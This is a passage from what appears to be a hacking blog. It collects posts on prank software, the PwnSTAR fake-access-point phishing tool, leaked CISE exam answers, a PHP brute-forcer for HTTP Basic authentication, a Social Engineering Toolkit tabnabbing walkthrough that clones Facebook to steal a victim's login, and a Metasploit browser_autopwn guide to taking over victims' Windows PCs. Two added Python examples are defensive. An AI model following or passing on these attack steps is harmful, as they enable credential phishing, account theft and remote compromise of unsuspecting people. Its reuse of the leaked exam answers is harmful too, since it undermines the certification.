<a href="http://www.rjlsoftware.com/software/entertainment/mouseclicks/download.shtml">Download MouseClicks</a><br />
28. Password Prank – This program displays a fake, but very realistic, password box to the user. No matter what key the user presses, it starts typing in its own password. Once the password is entered an error message is displayed to the user telling them their password is not long enough.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/password/download.shtml">Download Password Prank</a><br />
29. Pirated Software – Pirated Software is a prank that emulates the standard software installation or setup. However, the installation walks you through the steps of installing illegal software.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/pirate/download.shtml">Download Pirated Software</a><br />
30. Popup Prank – Popup Prank is a gag software program that allows you to simulate these online popup advertisements.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/popup/download.shtml">Download Popup Prank</a><br />
31. Print Me – When you launch Print Me the standard Windows Print dialog appears, no matter which button is pressed a fake print dialog screen displays to the user.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/printme/download.shtml">Download Print Me</a><br />
32. WAV Launcher – This is a hidden program launcher. It will launch a specified program or .wav file at user defined intervals.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/launcher/download.shtml">Download WAV Launcher</a><br />
33. Random Burper – It is a hidden software program that will play gross burp sounds randomly every minute until closed.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/burp/download.shtml">Download Random Burper</a><br />
34. ReplaceKeys – ReplaceKeys is a fun little prank that allows you to replace many keyboard keystrokes with different keyboard keystrokes.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/replacekeys/download.shtml">Download ReplaceKeys</a><br />
35. Rotate – Rotate is a desktop manipulator that will randomly flip the desktop into all sorts of weird positions.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/rotate/download.shtml">Download Rotate</a><br />
36. Screen Screw – Screen Screw does just that, it screws with your screen. When you launch Screen Screw it will appear as though your screen has some type of problem painting its colors.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/screenscrew/download.shtml">Download Screen Screw</a><br />
37. Shakedown – Shakedown will take your current desktop and shake it violently. This will not only annoy you to death, but also give your eyes a good strain.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/shakedown/download.shtml">Download Shakedown</a><br />
38. Show – Hide Desktop – Show – Hide Desktop is another fun Windows prank from RJL Software. This prank allows you to configure how often the desktop icons will hide and then show again.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/showhide/download.shtml">Download Show – Hide Desktop</a><br />
39. The Finger – Run The Finger on an unsuspecting user and watch their reaction when the cursor changes to the middle finger and then back to normal again.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/finger/download.shtml">Download The Finger</a><br />
40. Time Traveler – Time Traveler is a devious little prank that changes the Windows system clock to a random time. To make matters worse, Time Traveler runs invisible in the background performing this task every 30 seconds.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/traveler/download.shtml">Download Time Traveler</a><br />
41. Vista Upgrade Prank – The Vista Upgrade Prank starts by emulating the Windows Update service screen. Clicking the install or cancel button closes the update service window and appears to initiate the Vista Upgrade Advisor.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/vista/download.shtml">Download Vista Upgrade Prank</a><br />
42. Y2K Joke – Y2K is a silly software program that spoofs all of the Y2K issues. It simulates fixing your BIOS, mouse, monitor, and even corrects your calendar problems by changing all letter Ys to letter Ks.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/y2k/download.shtml">Download Y2K Joke</a><br />
<br />
All of the above links and pranks are completely safe; they do not harm or affect your system in any way. These applications are built purely for fun, so enjoy, have a nice time ahead, and keep smiling.<br />
Posted by Chandrakant<br />
<br />
<h2>PwnSTAR: Pwn_SofT_Ap_scRipt For Hacking</h2>
Published 2014-03-16<br />
It is basically a bash script to launch a fake AP, configurable with a wide variety of attack options. It includes a number of index.html and server PHP scripts for sniffing and phishing, and can act as a multi-client captive portal using PHP and iptables.<br />
Launches classic exploits such as evil-PDF. An easy way to launch the "best" Metasploit modules, e.g. CVE-2013-0422. De-auth with aireplay, airdrop-ng or MDK3.<br />
<br />
PwnSTAR.tgz is a bundle containing the current version of the script + all required webpages.<br />
<a href="https://code.google.com/p/pwn-star/downloads/list">Download Here</a><br />
<b><br />
Few Top features:-</b><br />
<br />
takes care of configuration of interfaces, macspoofing, airbase-ng and isc-dhcp-server<br />
steals WPA handshakes<br />
phishes email credentials<br />
serves webpages: supplied (eg hotspot, below) or provide your own<br />
sniffing with ferret and sslstrip<br />
adds a captive portal to the frontend of the fake AP<br />
assorted exploits<br />
de-auth with MDK3, aireplay-ng or airdrop-ng<br />
Use your imagination, craft your own webpages, and have fun.<br />
<br />
Download package contents:<br />
"hotspot_3" is a simple phishing web page, used with basic menu option 4.<br />
"portal_simple" is a captive portal which allows you to edit the index.html with the name of the portal eg "Joe's CyberCafe". It is used for sniffing.<br />
"portal_hotspot3" phishes credentials, and then allows clients through the portal to the internet.<br />
"portal_pdf" forces the client to download a malicious pdf in order to pass through the portal.<br />
Designed for Kali Linux and BackTrack5. The current version for Kali is PwnSTAR_0.9.<br />
<br />
<b>Installation process:-</b><br />
<br />
It is simple to install and use. Download it from the link above and then follow the screenshot.<br />
<a class="center" href="http://2.bp.blogspot.com/--Txk8nCOWPo/UyVh1RAT58I/AAAAAAAAFkE/cDN-RWsIELM/s100/12.png"><br />
<img height="399" src="http://2.bp.blogspot.com/--Txk8nCOWPo/UyVh1RAT58I/AAAAAAAAFkE/cDN-RWsIELM/s1000/12.png" width="750" /><br />
</a><br />
<br />
And the main menu is this:<br />
<br />
<a class="center" href="http://4.bp.blogspot.com/-pi1sCL9_gXc/UyVh9vdI_WI/AAAAAAAAFkM/7BUOnaRIqpM/s1600/11.png"><br />
<img height="399" src="http://4.bp.blogspot.com/-pi1sCL9_gXc/UyVh9vdI_WI/AAAAAAAAFkM/7BUOnaRIqpM/s1000/11.png" width="750" /><br />
</a><br />
<br />
Keep checking darksite.co.in for an upcoming tutorial on PwnSTAR.<br />
Posted by Chandrakant<br />
<br />
<h2>Lazy Kali Script for Kali Linux Must have</h2>
Published 2014-03-15; updated 2014-04-15<br />
Hi all, today I am going to tell you about a bash script that helps you handle many software updates in Kali Linux in a simple manner.<br />
Lazy Kali is just a simple bash script that lets you be lazy and adds quite a few tools to Kali Linux.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-AhqviakW8uM/UyPxuFSgVyI/AAAAAAAAFjI/zVF1j41xq6U/s1600/lazy+kali.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-AhqviakW8uM/UyPxuFSgVyI/AAAAAAAAFjI/zVF1j41xq6U/s400/lazy+kali.png" /></a></div>Here is the list of tools that you can add using Lazy Kali with the current version.<br />
<li>Bleeding Edge Repos<br />
<li>AngryIP Scanner<br />
<li>Terminator<br />
<li>Xchat<br />
<li>Unicornscan<br />
<li>Nautilus Open Terminal<br />
<li>Simple-Ducky<br />
<li>Subterfuge<br />
<li>Ghost-Phisher<br />
<li>Yamas<br />
<li>PwnStar<br />
<li>Ettercap0.7.6<br />
<li>Xssf<br />
<li>Smbexec<br />
<li>Flash<br />
<li>Java<br />
<li>Easy-Creds... and more!<br />
<br />
Lazy-Kali will also update Kali, start Metasploit services, and start, stop and update OpenVAS. This is the first version; the script is self-updating, so more will be added in a short time. Will try to add requested features.<br />
<br />
You can download lazy kali from <a href="https://code.google.com/p/lazykali/downloads/detail?name=lazykali.sh&can=2&q=">this link</a><br />
You will get a file named <b>lazykali.sh</b>. To install it, follow the screenshot.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-XBQBhf67FPc/UyP5nqjJhvI/AAAAAAAAFjY/RPstxtv58IM/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-XBQBhf67FPc/UyP5nqjJhvI/AAAAAAAAFjY/RPstxtv58IM/s400/4.png" /></a></div>If the script is not installed, it may prompt you to install it. Type Y to install the script.<br />
Once that is done you will see the menu shown in the first screenshot.<br />
<br />
There you go: you can select option 1 (update Kali) to update your Kali Linux.<br />
Likewise, if you select option 5 (sniffing/spoofing), you will see this menu.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-EsrlfMfRpNw/UyP67NFnCII/AAAAAAAAFjk/kFoa-pCMhsA/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-EsrlfMfRpNw/UyP67NFnCII/AAAAAAAAFjk/kFoa-pCMhsA/s400/2.png" /></a></div>If you select option 6 (installing extras), this screen will show up.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-2U_E6BCd6Tg/UyP7IaU4IJI/AAAAAAAAFjs/bqtBHrR5a2g/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-2U_E6BCd6Tg/UyP7IaU4IJI/AAAAAAAAFjs/bqtBHrR5a2g/s400/1.png" /></a></div>Hope this will make you lazy on Kali. Have fun.<br />
Thanks for reading.<br />
Posted by Chandrakant<br />
<br />
<h2>Innobuzz CISE (Certified Information Security Expert) Exam Question Answer</h2>
Published 2014-03-05; updated 2018-10-09<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
Hi everyone, here is the post that most people google for.<br />
Funnily, I have given the CISE exam multiple times for some of my friends. So let's not waste time<br />
and go directly into the questions; I am skipping the registration for the exam and the other bla bla bla part.<br />
<br />
Note: We published this Q/A after taking permission from Innobuzz, and these questions have changed now.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-6zovWZYRcgo/UxdpH6vbYsI/AAAAAAAAFeI/vwOG2MrOqRM/s1600/cise.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-6zovWZYRcgo/UxdpH6vbYsI/AAAAAAAAFeI/vwOG2MrOqRM/s400/cise.jpg" /></a></div>
Coming to the questions and answers:<br />
1) Enter the administrative contact mail address of innobuzz.in<br />
<br />
Answer:- It's very simple: go to who.is and search for innobuzz.in, and the answer will be shown in the search result.<br />
That is <b>innobuzz.control@gmail.com</b> <br />
<br />
2) Enter the domain name starting with "S" hosted on the same server as innobuzz.in.<br />
<br />
Answer:- Again, this can be solved easily online via <a href="http://www.yougetsignal.com/tools/web-sites-on-web-server/">Yougetsignal</a>, and the answer is <b>www.secfence.com</b> .<br />
<br />
3) Enter the exact name of the service running on port number 21 of innobuzz.in.<br />
<br />
Answer:- This answer can easily be found using nmap. If you are on BackTrack, you can use this simple command in a terminal:<br />
<br />
<b>nmap -A innobuzz.in</b> and you will see the answer in the scan result.<br />
<br />
The answer is <b>Pure-FTPd</b><br />
<br />
4) Here is one of the funny questions: the password is being sent in an HTTP header. Catch it and enter it below.<br />
<br />
Answer:- You can easily see it using the Mozilla Live HTTP Headers add-on.<br />
<br />
And The Answer is <b>ADMIN@123</b>.<br />
<br />
5) Here comes the final one, again a good one: enter the password.<br />
<br />
Answer:- You just need to view the source (Ctrl+U); you will see something like this in green: "cDQ1c3dyMGQyIyRAIQ=="<br />
<br />
Now this is a base64-encoded string; you can easily decode it with an online site like <a href="http://www.base64decode.org/">http://www.base64decode.org</a>.<br />
<br />
The answer will be <b>p45swr0d2#$@!</b><br />
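Added example (not part of the original post or the exam): base64 is an encoding, not protection, so a value like the one in question 5 is readable by anyone who views the source. The Python below scans page source for base64 tokens that decode to printable text, a check a site owner can run before publishing; the sample page and the function names are constructed for illustration.<br />

```python
import base64
import binascii
import re
import string

# Constructed sample page modelled on question 5: a value left in an HTML
# comment. The token itself is the one quoted in the post.
SAMPLE_HTML = """<html><body>
<!-- cDQ1c3dyMGQyIyRAIQ== -->
<form method="post"><input type="password" name="pw"></form>
<img src="logo.png" alt="Login">
</body></html>"""

# A run of at least 12 base64-alphabet characters with optional padding,
# not glued to further base64 characters on either side.
B64_TOKEN = re.compile(
    r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{12,}={0,2}(?![A-Za-z0-9+/=])"
)
PRINTABLE = set(string.printable) - set("\x0b\x0c")


def decode_if_text(token):
    """Return the decoded text if token is valid base64 of printable ASCII."""
    if len(token) % 4 != 0:
        return None  # correctly padded base64 is always a multiple of 4
    try:
        raw = base64.b64decode(token, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError):
        return None  # not base64, or decodes to non-ASCII bytes
    if not text or any(ch not in PRINTABLE for ch in text):
        return None
    return text


def find_encoded_strings(html):
    """Return (line number, token, decoded text) for each readable token."""
    findings = []
    for lineno, line in enumerate(html.splitlines(), start=1):
        for match in B64_TOKEN.finditer(line):
            text = decode_if_text(match.group(0))
            if text is not None:
                findings.append((lineno, match.group(0), text))
    return findings


if __name__ == "__main__":
    for lineno, token, text in find_encoded_strings(SAMPLE_HTML):
        print(f"line {lineno}: {token} decodes to {text!r}")
```

Anything a check like this finds should be removed from the page and verified on the server instead, since the browser receives every byte of the source.<br />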
<br />
I believe this exam was easy, yes. After submitting the answers you will get a code, which you need to submit at the Innobuzz portal,<br />
after which you will get the CISE certificate.<br />
<br />
Please do comment if you have faced any questions; you can also add new questions if you get any during the exam.<br />
Find the screenshots here:<br />
<a href="http://3.bp.blogspot.com/-8OpSKClELxs/UxdnnOzkH5I/AAAAAAAAFdc/B0MblaGUVaY/s1600/1.jpg" imageanchor="1"><img border="0" src="https://3.bp.blogspot.com/-8OpSKClELxs/UxdnnOzkH5I/AAAAAAAAFdc/B0MblaGUVaY/s320/1.jpg" /></a><br />
<a href="http://2.bp.blogspot.com/-j_fTSMHG1zQ/UxdnyGJl-HI/AAAAAAAAFdk/OkkfHu9itto/s1600/2.jpg" imageanchor="1"><img border="0" src="https://2.bp.blogspot.com/-j_fTSMHG1zQ/UxdnyGJl-HI/AAAAAAAAFdk/OkkfHu9itto/s320/2.jpg" /></a><br />
<a href="http://2.bp.blogspot.com/-CZOdWFX-N5c/Uxdn4CrUIdI/AAAAAAAAFds/NL725hUTgJI/s1600/3.jpg" imageanchor="1"><img border="0" src="https://2.bp.blogspot.com/-CZOdWFX-N5c/Uxdn4CrUIdI/AAAAAAAAFds/NL725hUTgJI/s320/3.jpg" /></a><br />
<a href="http://3.bp.blogspot.com/-VI7GgL26kDo/UxdoAY5kO1I/AAAAAAAAFd0/JOv4GWKvDTk/s1600/4.jpg" imageanchor="1"><img border="0" src="https://3.bp.blogspot.com/-VI7GgL26kDo/UxdoAY5kO1I/AAAAAAAAFd0/JOv4GWKvDTk/s320/4.jpg" /></a><br />
<a href="http://4.bp.blogspot.com/-KEDFd6_n1NY/UxdoFjOYVaI/AAAAAAAAFd8/tqkwtG10X10/s1600/5Ans.jpg" imageanchor="1"><img border="0" src="https://4.bp.blogspot.com/-KEDFd6_n1NY/UxdoFjOYVaI/AAAAAAAAFd8/tqkwtG10X10/s320/5Ans.jpg" /></a><br />
<br />
Please do comment if you like this or want more posts on any topic.<br />
<br />
Thanks for visiting.<br />
<br />
<br />
<br /></div>
Posted by Chandrakant<br />
<br />
<h2>PHP Script For Cracking http Basic Authentication</h2>
Published 2014-02-27<br />
Hi, in this post I am again sharing an article by one of my very nice friends, <a href="http://www.mannulinux.org/">manish</a>. This PHP shell helps in cracking HTTP basic authentication passwords. Now let's come to the real topic: what exactly is basic auth?<br />
<div class="center"><a href="http://2.bp.blogspot.com/-UcbDUxGNCkk/Uw8SPks32YI/AAAAAAAABVk/NLxGO7qvukU/s1600/http4.png"><br />
<img height="399" src="http://2.bp.blogspot.com/-UcbDUxGNCkk/Uw8SPks32YI/AAAAAAAABVk/NLxGO7qvukU/s800/http4.png" width="620" /><br />
</a><br />
<span>Http Basic Auth Cracker PHP Script</span><br />
</div><br />
In an HTTP transaction (request-response), basic access authentication is a method for an HTTP user agent to provide a user name and password when making a request. After you provide the correct user ID and password when asked,<br />
<br />
<div class="center"><a href="http://2.bp.blogspot.com/-C7N73qzKy3Q/Uw8P6V3NnqI/AAAAAAAABVY/peLINVqlJnY/s1600/http3.png"><br />
<img height="199" src="http://2.bp.blogspot.com/-C7N73qzKy3Q/Uw8P6V3NnqI/AAAAAAAABVY/peLINVqlJnY/s600/http3.png" width="320" /><br />
</a><br />
<span>Basic Auth Prompt</span><br />
</div><br />
it will allow you to make the HTTP request. So our objective here is to break it, that is, to get the correct user ID and password.<br />
We can do that with the help of a PHP script and a brute-force attack.<br />
You can brute force any panel that uses basic authentication with this script.<br />
<br />
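Added example (not the script from the post): a defender's view of the same weakness. Apache's access log shows a 401 status, and usually the attempted user name, for each failed Basic-auth attempt, so a guessing run stands out; the Python below flags client IPs with a burst of 401s and reports any successful login that follows. The log lines, addresses, threshold and function names are constructed assumptions.<br />

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache common-log lines for a Basic-auth protected /admin/ path.
# The addresses are documentation ranges (RFC 5737), not real hosts.
SAMPLE_LOG = """\
198.51.100.20 - - [27/Feb/2014:23:40:01 +0530] "GET /admin/ HTTP/1.1" 401 381
198.51.100.20 - alice [27/Feb/2014:23:40:09 +0530] "GET /admin/ HTTP/1.1" 200 5120
203.0.113.7 - admin [27/Feb/2014:23:41:00 +0530] "GET /admin/ HTTP/1.1" 401 381
203.0.113.7 - admin [27/Feb/2014:23:41:01 +0530] "GET /admin/ HTTP/1.1" 401 381
203.0.113.7 - root [27/Feb/2014:23:41:01 +0530] "GET /admin/ HTTP/1.1" 401 381
203.0.113.7 - root [27/Feb/2014:23:41:02 +0530] "GET /admin/ HTTP/1.1" 401 381
203.0.113.7 - admin [27/Feb/2014:23:41:03 +0530] "GET /admin/ HTTP/1.1" 401 381
203.0.113.7 - admin [27/Feb/2014:23:41:04 +0530] "GET /admin/ HTTP/1.1" 401 381
203.0.113.7 - admin [27/Feb/2014:23:41:05 +0530] "GET /admin/ HTTP/1.1" 200 5120
"""

LINE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse(log_text):
    """Yield (ip, user, time, status) for every well-formed log line."""
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m:
            when = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
            yield m.group("ip"), m.group("user"), when, int(m.group("status"))


def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag IPs with at least `threshold` 401 responses inside `window`.

    A normal browser produces one 401 (the request sent before the prompt)
    and then a 200, so a small threshold separates it from a guessing run.
    """
    failures = defaultdict(list)   # ip -> [(time, attempted user)]
    successes = defaultdict(list)  # ip -> [(time, authenticated user)]
    for ip, user, when, status in parse(log_text):
        if status == 401:
            failures[ip].append((when, user))
        elif status == 200 and user != "-":
            successes[ip].append((when, user))

    findings = []
    for ip in sorted(failures):
        fails = sorted(failures[ip])
        detected_at = None
        start = 0
        for end, (when, _) in enumerate(fails):
            # Slide the window start forward until it spans at most `window`.
            while when - fails[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                detected_at = when
                break
        if detected_at is None:
            continue
        findings.append({
            "ip": ip,
            "failures": len(fails),
            "users_tried": sorted({u for _, u in fails if u != "-"}),
            # A 200 after the burst means a guess probably succeeded.
            "success_after_burst": sorted(
                {u for t, u in successes.get(ip, []) if t >= detected_at}
            ),
        })
    return findings


if __name__ == "__main__":
    for finding in detect_bruteforce(SAMPLE_LOG):
        print(finding)
```

The same per-IP counts can drive a rate limit or temporary ban, and any account listed under success_after_burst should have its password changed.<br />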
<a href="http://www.mediafire.com/download/3fa25np8nmflmxd/http.php"><br />
download link here</a><br />
<br />
The procedure is very simple:<br />
<br />
You need to supply the link where htaccess is implemented, a username list and a password list.<br />
<br />
<div class="center"><a href="http://2.bp.blogspot.com/-n7lBBFjsLl4/Uw8US4rhaQI/AAAAAAAABVw/yHnSSasIifM/s1600/http.png"><br />
<img height="399" src="http://2.bp.blogspot.com/-n7lBBFjsLl4/Uw8US4rhaQI/AAAAAAAABVw/yHnSSasIifM/s1600/http.png" width="620" /><br />
</a><br />
<span>provide possible username and password list</span><br />
</div><br />
and click the "<b>lets hex this shit</b>" button.<br />
If the password is weak or in your password list, you will get a success message like this:<br />
<br />
<div class="center"><a href="http://3.bp.blogspot.com/-0MMeMxEs0SI/Uw8VoNRWsQI/AAAAAAAABV8/DZuBYfIEmVE/s1600/http2.png"><br />
<img height="399" src="http://3.bp.blogspot.com/-0MMeMxEs0SI/Uw8VoNRWsQI/AAAAAAAABV8/DZuBYfIEmVE/s1600/http2.png" width="620" /><br />
</a><br />
<span>Cracked Successfully :)</span><br />
</div><br />
enjoy :)<br />
with love from Team IndiShell<br />
If you have any problem regarding this script, you can message manish on Facebook:<br />
http://facebook.com/manish1046<br />
<br />
It works very nicely; you should definitely give it a try :) if you encounter HTTP basic auth somewhere :).<br />
Posted by Chandrakant<br />
<br />
<h2>Tabnabbing Attack with social Engineering toolkit on Backtrack | kali</h2>
Published 2014-02-23<br />
Hi everyone, here is the post that explains a very fundamental attack known as the tabnabbing attack. The attack is very simple: you send a link to the victim, he/she clicks on it and is redirected to your desired login page, which looks like the original, and after he/she enters credentials you get them in no time.<br />
So let's do this with the Social Engineering Toolkit, as a social engineering trick is very necessary here.<br />
Before doing anything, check your own BT/Kali system IP address by typing the <b>ifconfig</b> command.<br />
Then open your BackTrack terminal and type <b>cd /pentest/exploits/set</b><br />
Now open the Social Engineering Toolkit (SET): <b>./set</b><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-OrLz771w7m0/Uwj2LNVSg-I/AAAAAAAAFb8/Q4DaQrjFpok/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-OrLz771w7m0/Uwj2LNVSg-I/AAAAAAAAFb8/Q4DaQrjFpok/s720/1.png" /></a></div>After that, choose the social engineering attack, that is option 1, and then choose option 2, <b>“Website Attack Vectors”</b>.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-h67ysEQZmVM/Uwj2gXJGqBI/AAAAAAAAFcE/ZCIdCA99EGw/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-h67ysEQZmVM/Uwj2gXJGqBI/AAAAAAAAFcE/ZCIdCA99EGw/s520/2.png" /></a></div>A list of options will be populated; you have to select option<b> 4 “Tabnabbing Attack Method”</b>.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-TovGFgxoc3M/Uwj21B9SDJI/AAAAAAAAFcM/JO9CPE-Jlh8/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-TovGFgxoc3M/Uwj21B9SDJI/AAAAAAAAFcM/JO9CPE-Jlh8/s520/3.png" /></a></div>Next choose option 2, <b>“Site Cloner”</b>.<br />
It will ask for your system IP, which you can give from the ifconfig output (<b>your backtrack machine ip</b>).<br />
Then enter the URL of the site you want to clone, in this case<b> http://www.facebook.com </b>, and hit Enter. SET will clone the web site. Press Return to continue.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-mqxE0JTA7LY/Uwj3Sk294kI/AAAAAAAAFcU/YlX71xrRqG0/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-mqxE0JTA7LY/Uwj3Sk294kI/AAAAAAAAFcU/YlX71xrRqG0/s520/5.png" /></a></div>Now convert your URL into a Google URL using goo.gl and send this link address to your victim via email, chat or any other social way you can make it reach the victim.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-RPtCEUjvmj4/Uwj36JshFlI/AAAAAAAAFcc/xYxd8F0Qs_E/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-RPtCEUjvmj4/Uwj36JshFlI/AAAAAAAAFcc/xYxd8F0Qs_E/s520/7.png" /></a></div>When the victim opens it in their browser, there should be a message that the page is still loading, so the victim starts to open another tab. As soon as the victim opens a new tab, our fake website starts working. That script will redirect the victim to the phishing page you derived.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-pa5etwWQpd0/Uwj4Bn_xUaI/AAAAAAAAFck/GLsdp3-6XwE/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-pa5etwWQpd0/Uwj4Bn_xUaI/AAAAAAAAFck/GLsdp3-6XwE/s520/8.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-3HqB3FjBgAA/Uwj4Jd2bcOI/AAAAAAAAFcs/p8oOqvt62YY/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-3HqB3FjBgAA/Uwj4Jd2bcOI/AAAAAAAAFcs/p8oOqvt62YY/s320/9.png" /></a></div>Here you go: these are the user ID and password of the victim :D.<br />
Be safe, keep hacking :).<br />
Posted by Chandrakant<br />
<br />
<h2>Hack Remote Windows 7 | XP PC With Metasploit (Browser Auto Pwn Vulnerability)</h2>
Published 2014-02-09<br />
Hi all, this is one of the popular attacks, known as the browser auto pwn vulnerability, which we are going to use in this tutorial.<br />
This is a simple vulnerability that allows an attacker to hack a remote machine with just a single click by the victim.<br />
<font color="green"><b>-::Using Metasploit::-</b></font><br />
In Metasploit there is a module known as browser autopwn. The basic idea behind the module is that it creates a web server on our local machine which contains different kinds of browser exploits. When the user opens the malicious link, the exploits start executing against the user's browser, and if one of the exploits is successful a meterpreter session will open.<br />
<br />
Follow these steps to carry out the attack.<br />
Open your BackTrack/Kali terminal and make sure Metasploit is there (it is present by default :D ).<br />
Type #<b>msfconsole</b> in the terminal.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-5MBpkpP1Nw0/Uvcpwv91-RI/AAAAAAAAFbQ/PotAl7VsMqQ/s1600/msfconsole.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="msfconsole" src="http://2.bp.blogspot.com/-5MBpkpP1Nw0/Uvcpwv91-RI/AAAAAAAAFbQ/PotAl7VsMqQ/s520/msfconsole.png" /></a></div><br />
Now follow these steps as shown in the image.<br />
Use the browser_autopwn module.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/--ZyLQL9wlbI/UvcqU1E2iEI/AAAAAAAAFbY/hR303hVixT4/s1600/use+auxiliry.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="use browser auto pwn" src="http://1.bp.blogspot.com/--ZyLQL9wlbI/UvcqU1E2iEI/AAAAAAAAFbY/hR303hVixT4/s920/use+auxiliry.png" height=400 width=580 /></a></div><br />
We have set LHOST to our IP address, the port to 4445 and URIPATH to / in order to prevent Metasploit from setting up random URLs. Now you will see the image below.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-_Cy3Iy0r8uw/Uvcqvc1ZjCI/AAAAAAAAFbg/q1ggmlnOOAM/s1600/server+started.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="server started with 16 module" src="http://4.bp.blogspot.com/-_Cy3Iy0r8uw/Uvcqvc1ZjCI/AAAAAAAAFbg/q1ggmlnOOAM/s320/server+started.png" /></a></div>Server started with 16 modules.<br />
Next we need to send the link to the victim (like here http://192.168.205.131:8080/). As soon as the victim opens the link, it's all done.<br />
We have meterpreter shell control in our hands; you can do the various activities you wish with the meterpreter shell functionality.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-IvgilcQ_2FM/UvcrlqzQseI/AAAAAAAAFbo/KRby12yhkhI/s1600/hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-IvgilcQ_2FM/UvcrlqzQseI/AAAAAAAAFbo/KRby12yhkhI/s920/hacked.png" /></a></div><br />
Enjoy the hack of your victim machine and have fun.<br />
Posted by Chandrakant<br />
<br />
<h2>Downloadable Vulnerable Web Application For Practice Hacking Skills:</h2>
Published 2014-02-01<br />
<b>Part2</b>:<br />
In part 1 of this post I listed <a href="http://www.darksite.co.in/2014/01/online-sites-for-practice-hacking-skills.html">Online | Live Sites For Practice Web Application Hacking Skills</a>. Now here I will give you links for downloading ISO/zip files which you can install and enjoy in the best possible way.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-qK2VuJKEeLY/Uuy4WkeQPAI/AAAAAAAAFaE/U3oQ-BCGEbw/s1600/offline+hacking.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Hacking practice vulnerable" src="http://3.bp.blogspot.com/-qK2VuJKEeLY/Uuy4WkeQPAI/AAAAAAAAFaE/U3oQ-BCGEbw/s1600/offline+hacking.jpg" /></a></div>With these vulnerable web applications you can test your web hacking knowledge, pen-testing tools, skills, and kung-fu on, with an added bonus... without going to jail :) The vulnerable web applications have been classified in two categories: offline, VMs/ISOs.<br />
The following list references downloadable vulnerable web applications to play with that can be installed on a standard operating system (Linux, Windows, Mac OS X, etc) using a standard web platform (Apache/PHP, Tomcat/Java, IIS/.NET, etc). I am sure this will sharpen your hacking skills; take these as a challenge, and I am sure this will be a boost for you.<br />
<font color="green"><h2>List of offline VM/ISOs For Practicing Hacking Skills </h2></font><br />
